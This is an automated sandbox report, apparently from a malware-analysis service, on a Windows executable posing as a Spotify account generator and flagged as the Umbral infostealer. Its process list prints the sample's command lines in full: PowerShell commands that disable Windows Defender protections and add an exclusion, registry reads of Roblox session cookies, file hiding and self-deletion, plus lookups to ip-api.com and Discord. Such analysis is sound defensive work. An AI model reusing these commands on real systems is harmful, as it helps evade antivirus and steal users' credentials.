Analysis
-
max time kernel
18s -
max time network
19s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
25-07-2024 02:26
Behavioral task
behavioral1
Sample
DD Spotify Acc Gen.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
DD Spotify Acc Gen.exe
Resource
win7-20240705-en
Behavioral task
behavioral3
Sample
DD Spotify Acc Gen.exe
Resource
win10v2004-20240709-en
General
-
Target
DD Spotify Acc Gen.exe
-
Size
296KB
-
MD5
c4cf132278a366635533a2734901aa95
-
SHA1
06ea6b94f8accb59c3115c67208a1116a12a7f1e
-
SHA256
382f9d13e5a5945980c767ec1d98732d971a4e07bdb9ed1950d6c455edbb203a
-
SHA512
d6f4343892a266db8b62892d0c8eef5e63492f49e237d704cf2c5237fe5249f948dbbc8471ae2db00a862af9d7658c6286a72a0f3134786dae82d5fad72eb120
-
SSDEEP
6144:dloZM+rIkd8g+EtXHkv/iD4PaIWVjgULYyD1Ac5eIb8e1mWiQ:/oZVL+EP8PaIWVjgULYyD1Ac5n0
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral4/memory/3332-0-0x0000017578C40000-0x0000017578C90000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 2320 powershell.exe 3168 powershell.exe 2752 powershell.exe 3600 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts DD Spotify Acc Gen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 discord.com 6 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4440 cmd.exe 2880 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 248 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2880 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3332 DD Spotify Acc Gen.exe 3600 powershell.exe 3600 powershell.exe 2320 powershell.exe 2320 powershell.exe 3168 powershell.exe 3168 powershell.exe 444 powershell.exe 444 powershell.exe 2752 powershell.exe 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3332 DD Spotify Acc Gen.exe Token: SeIncreaseQuotaPrivilege 2920 wmic.exe Token: SeSecurityPrivilege 2920 wmic.exe Token: SeTakeOwnershipPrivilege 2920 wmic.exe Token: SeLoadDriverPrivilege 2920 wmic.exe Token: SeSystemProfilePrivilege 2920 wmic.exe Token: SeSystemtimePrivilege 2920 wmic.exe Token: SeProfSingleProcessPrivilege 2920 wmic.exe Token: SeIncBasePriorityPrivilege 2920 wmic.exe Token: SeCreatePagefilePrivilege 2920 wmic.exe Token: SeBackupPrivilege 2920 wmic.exe Token: SeRestorePrivilege 2920 wmic.exe Token: SeShutdownPrivilege 2920 wmic.exe Token: SeDebugPrivilege 2920 wmic.exe Token: SeSystemEnvironmentPrivilege 2920 wmic.exe Token: SeRemoteShutdownPrivilege 2920 wmic.exe Token: SeUndockPrivilege 2920 wmic.exe Token: SeManageVolumePrivilege 2920 wmic.exe Token: 33 2920 wmic.exe Token: 34 2920 wmic.exe Token: 35 2920 wmic.exe Token: 36 2920 wmic.exe Token: SeIncreaseQuotaPrivilege 2920 wmic.exe Token: SeSecurityPrivilege 2920 wmic.exe Token: SeTakeOwnershipPrivilege 2920 wmic.exe Token: SeLoadDriverPrivilege 2920 wmic.exe Token: SeSystemProfilePrivilege 2920 wmic.exe Token: SeSystemtimePrivilege 2920 wmic.exe Token: SeProfSingleProcessPrivilege 2920 wmic.exe Token: SeIncBasePriorityPrivilege 2920 wmic.exe Token: SeCreatePagefilePrivilege 2920 wmic.exe Token: SeBackupPrivilege 2920 wmic.exe Token: SeRestorePrivilege 2920 wmic.exe Token: SeShutdownPrivilege 2920 wmic.exe Token: SeDebugPrivilege 2920 wmic.exe Token: SeSystemEnvironmentPrivilege 2920 wmic.exe Token: SeRemoteShutdownPrivilege 2920 wmic.exe Token: SeUndockPrivilege 2920 wmic.exe Token: SeManageVolumePrivilege 2920 wmic.exe Token: 33 2920 wmic.exe Token: 34 2920 wmic.exe Token: 35 2920 wmic.exe Token: 36 2920 wmic.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 444 powershell.exe Token: SeIncreaseQuotaPrivilege 1568 wmic.exe Token: SeSecurityPrivilege 1568 wmic.exe Token: SeTakeOwnershipPrivilege 1568 wmic.exe Token: SeLoadDriverPrivilege 1568 wmic.exe Token: SeSystemProfilePrivilege 1568 wmic.exe Token: SeSystemtimePrivilege 1568 wmic.exe Token: SeProfSingleProcessPrivilege 1568 wmic.exe Token: SeIncBasePriorityPrivilege 1568 wmic.exe Token: SeCreatePagefilePrivilege 1568 wmic.exe Token: SeBackupPrivilege 1568 wmic.exe Token: SeRestorePrivilege 1568 wmic.exe Token: SeShutdownPrivilege 1568 wmic.exe Token: SeDebugPrivilege 1568 wmic.exe Token: SeSystemEnvironmentPrivilege 1568 wmic.exe Token: SeRemoteShutdownPrivilege 1568 wmic.exe Token: SeUndockPrivilege 1568 wmic.exe Token: SeManageVolumePrivilege 1568 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3332 wrote to memory of 2920 3332 DD Spotify Acc Gen.exe 83 PID 3332 wrote to memory of 2920 3332 DD Spotify Acc Gen.exe 83 PID 3332 wrote to memory of 2028 3332 DD Spotify Acc Gen.exe 86 PID 3332 wrote to memory of 2028 3332 DD Spotify Acc Gen.exe 86 PID 3332 wrote to memory of 3600 3332 DD Spotify Acc Gen.exe 88 PID 3332 wrote to memory of 3600 3332 DD Spotify Acc Gen.exe 88 PID 3332 wrote to memory of 2320 3332 DD Spotify Acc Gen.exe 91 PID 3332 wrote to memory of 2320 3332 DD Spotify Acc Gen.exe 91 PID 3332 wrote to memory of 3168 3332 DD Spotify Acc Gen.exe 93 PID 3332 wrote to memory of 3168 3332 DD Spotify Acc Gen.exe 93 PID 3332 wrote to memory of 444 3332 DD Spotify Acc Gen.exe 95 PID 3332 wrote to memory of 444 3332 DD Spotify Acc Gen.exe 95 PID 3332 wrote to memory of 1568 3332 DD Spotify Acc Gen.exe 97 PID 3332 wrote to memory of 1568 3332 DD Spotify Acc Gen.exe 97 PID 3332 wrote to memory of 5092 3332 DD Spotify Acc Gen.exe 99 PID 3332 wrote to memory of 5092 3332 DD Spotify Acc Gen.exe 99 PID 3332 wrote to memory of 1800 3332 DD Spotify Acc Gen.exe 101 PID 3332 wrote to memory of 1800 3332 DD Spotify Acc Gen.exe 101 PID 3332 wrote to memory of 2752 3332 DD Spotify Acc Gen.exe 103 PID 3332 wrote to memory of 2752 3332 DD Spotify Acc Gen.exe 103 PID 3332 wrote to memory of 248 3332 DD Spotify Acc Gen.exe 105 PID 3332 wrote to memory of 248 3332 DD Spotify Acc Gen.exe 105 PID 3332 wrote to memory of 4440 3332 DD Spotify Acc Gen.exe 107 PID 3332 wrote to memory of 4440 3332 DD Spotify Acc Gen.exe 107 PID 4440 wrote to memory of 2880 4440 cmd.exe 109 PID 4440 wrote to memory of 2880 4440 cmd.exe 109 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2028 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"2⤵
- Views/modifies file attributes
PID:2028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:444
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:5092
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:248
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2880
-
-
Network
-
Remote address:8.8.8.8:53Requestgstatic.comIN AResponsegstatic.comIN A216.58.201.99
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTR
-
Remote address:208.95.112.1:80RequestGET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Request99.201.58.216.in-addr.arpaIN PTRResponse99.201.58.216.in-addr.arpaIN PTRprg03s02-in-f31e100net99.201.58.216.in-addr.arpaIN PTRprg03s02-in-f99�G99.201.58.216.in-addr.arpaIN PTRlhr48s48-in-f3�G
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.128.233discord.comIN A162.159.136.232discord.comIN A162.159.138.232discord.comIN A162.159.135.232discord.comIN A162.159.137.232
-
Remote address:8.8.8.8:53Request233.128.159.162.in-addr.arpaIN PTRResponse
-
Remote address:208.95.112.1:80RequestGET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 161
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
803 B 5.3kB 8 8
-
362 B 482 B 6 3
HTTP Request
GET http://ip-api.com/line/?fields=hostingHTTP Response
200 -
377 B 550 B 7 5
HTTP Request
GET http://ip-api.com/json/?fields=225545HTTP Response
200 -
569.7kB 21.1kB 425 274
-
321 B 330 B 5 4
DNS Request
gstatic.com
DNS Response
216.58.201.99
DNS Request
ip-api.com
DNS Response
208.95.112.1
DNS Request
8.8.8.8.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
DNS Request
1.112.95.208.in-addr.arpa
-
203 B 442 B 3 3
DNS Request
99.201.58.216.in-addr.arpa
DNS Request
discord.com
DNS Response
162.159.128.233162.159.136.232162.159.138.232162.159.135.232162.159.137.232
DNS Request
233.128.159.162.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
948B
MD545741c307af2576c6437c5fdb24ef9ce
SHA1a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf
SHA2567887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2
SHA51239fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941
-
Filesize
1KB
MD50ac871344dc49ae49f13f0f88acb4868
SHA15a073862375c7e79255bb0eab32c635b57a77f98
SHA256688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
SHA512ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006
-
Filesize
1KB
MD5c321dfee531730b7e0b81470b947da3f
SHA10488401f4fc03bcdab19eeff194ff12f4439e1cb
SHA2566d7da148fe930cf085b5369427eb24e66844d7f00fcc197f056e0763c7a76117
SHA512eee78a9529b1d89631ac8dbaef716eba95166d8c465a2c075bf89d28fab4c25a48c4d29d7f19ab0249b245bf45fac63214b092aaef9b3a09b4f8e6cfa85a076a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82